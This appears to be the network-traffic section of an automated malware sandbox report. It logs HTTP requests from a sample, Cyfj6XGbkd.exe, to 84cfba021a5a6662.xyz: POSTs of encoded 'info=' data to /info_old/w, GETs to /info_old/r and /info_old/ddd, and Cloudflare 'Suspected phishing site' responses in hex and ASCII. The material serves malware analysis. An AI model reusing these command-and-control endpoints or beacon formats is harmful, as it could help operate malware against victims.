                                                                                                                                                    Data Ascii: info=WySAnbXjWTW8YGXUGcJV9XQKqvXCI1AmWDBJj4U-g1WKRvnxTscwduFT2BfCXgg0h7Sxqatla3ng8ukL-pl8Dr8N8HqDpScYTbUy6uw5ZL9dPu8tHcojNoSU10abrQpDeo-iZUd0ZAP3qOZLIQKMvflWIEmwltfDdeu99jzqugL6T_r7fxFSb4rHJERaX4_jyMdhhc_PlkBCrZmVaMIUFD-4W15kLI477nYNSGFdl2ogM8
                                                                                                                                                    Jan 29, 2021 17:36:56.243818045 CET225INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:56 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=d32f2108bb076b21c1c63ae0d28e80c8e1611938216; expires=Sun, 28-Feb-21 16:36:56 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a51220000fa880fab6000000001
                                                                                                                                                    Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=4cBjVt6maK1fuMMQwP2NLxcTyTXIs04jwjJLktsaBAHCzMfSBk5sXhUCUfo1tWttLn99vsmrv4c3y411195%2BQM9Kt0D3ZN8BEjIGDpMtuLMG3f%2BpWg%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945ffb6a69fa88-AMS
                                                                                                                                                    Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport"
                                                                                                                                                    Jan 29, 2021 17:36:56.298440933 CET230OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 81
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
                                                                                                                                                    Jan 29, 2021 17:36:56.298528910 CET230OUTData Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 54 73 53 51 77 4d 54 49 33 54 34 75 51 75 36 42 57 4d 67 78 70 67 7e
                                                                                                                                                    Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVTsSQwMTI3T4uQu6BWMgxpg~
                                                                                                                                                    Jan 29, 2021 17:36:56.357669115 CET231INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:56 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=d32f2108bb076b21c1c63ae0d28e80c8e1611938216; expires=Sun, 28-Feb-21 16:36:56 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a51900000fa8854a82000000001
                                                                                                                                                    Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=vEXjgAcCWfJcyMvkOYR6nKRhmvxrpnQ9If4uVJkHoTC%2BmHUhl3TvkTuOyvHTcR3VHcQHxuwGIbIsHFsPo39NKLWzrt1TdOP5Xspnnfrx95e0%2BZOKcA%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945ffc1c10fa88-AMS
                                                                                                                                                    Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport"
                                                                                                                                                    Jan 29, 2021 17:36:56.360771894 CET236OUTGET /info_old/r HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
                                                                                                                                                    Jan 29, 2021 17:36:56.421464920 CET237INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:56 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=d32f2108bb076b21c1c63ae0d28e80c8e1611938216; expires=Sun, 28-Feb-21 16:36:56 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a51d00000fa881c8c6000000001
                                                                                                                                                    Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=2R%2F90jP2adhrJ1reGaFc1uVWg0BTxfIBXZsYWbtqsmfadTi2Wy%2FxqhIGyogEoPocOCreTgk%2BamVP09M9vOnBLLLcfzZaC3rdbKVDP0I9AO%2Bdkcw30w%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945ffc7cf6fa88-AMS
                                                                                                                                                    Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewpo
                                                                                                                                                    Jan 29, 2021 17:36:58.555171967 CET242OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 81
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
                                                                                                                                                    Jan 29, 2021 17:36:58.555293083 CET242OUTData Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 65 4c 39 39 71 72 45 30 32 4f 31 47 46 52 6a 30 50 36 5f 47 36 63 7e
                                                                                                                                                    Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVeL99qrE02O1GFRj0P6_G6c~
                                                                                                                                                    Jan 29, 2021 17:36:58.605498075 CET243INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:58 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=d603c7de3c048bd21973481136751b3721611938218; expires=Sun, 28-Feb-21 16:36:58 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a5a5f0000fa881330c000000001
                                                                                                                                                    Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=NJAqAO4yJWPuTq9evI1AWyMeynWnmxEMn3et8pb%2FIRWAHDRDQDU542KBRo8FHOiPxwUweybLvunWWx5kRs55wa40ZiQgHguurv9cq%2BH%2BRXDGjR9gjw%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 6194600a3d73fa88-AMS
                                                                                                                                                    Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    3192.168.2.649734104.21.23.1680C:\Users\user\Desktop\Cyfj6XGbkd.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Jan 29, 2021 17:37:04.743166924 CET254OUTGET /info_old/ddd HTTP/1.1
                                                                                                                                                    Host: 84CFBA021A5A6662.xyz
                                                                                                                                                    Accept: */*
                                                                                                                                                    Jan 29, 2021 17:37:04.802903891 CET256INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:37:04 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=d1b86623561079a9b662c2aad2de952a91611938224; expires=Sun, 28-Feb-21 16:37:04 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a728b00001ea9ad122000000001
                                                                                                                                                    Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=wH1AHcFc3kF96qmxaUBXlzDcY1TrtECZey%2Fv0bKfWmOYNqSDV7GGD9mBtDVKq6xIogzQHOnoCmodhKiY1BSgSe06IfFuNHZGnZqol7y6zlSw5Ire4A%3D%3D"}],"group":"cf-nel"}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61946030d9121ea9-AMS
                                                                                                                                                    Data Raw: 31 30 64 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f
                                                                                                                                                    Data Ascii: 10d5<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" co
                                                                                                                                                    Jan 29, 2021 17:37:04.803014040 CET257INData Raw: 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73
                                                                                                                                                    Data Ascii: ntent="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-
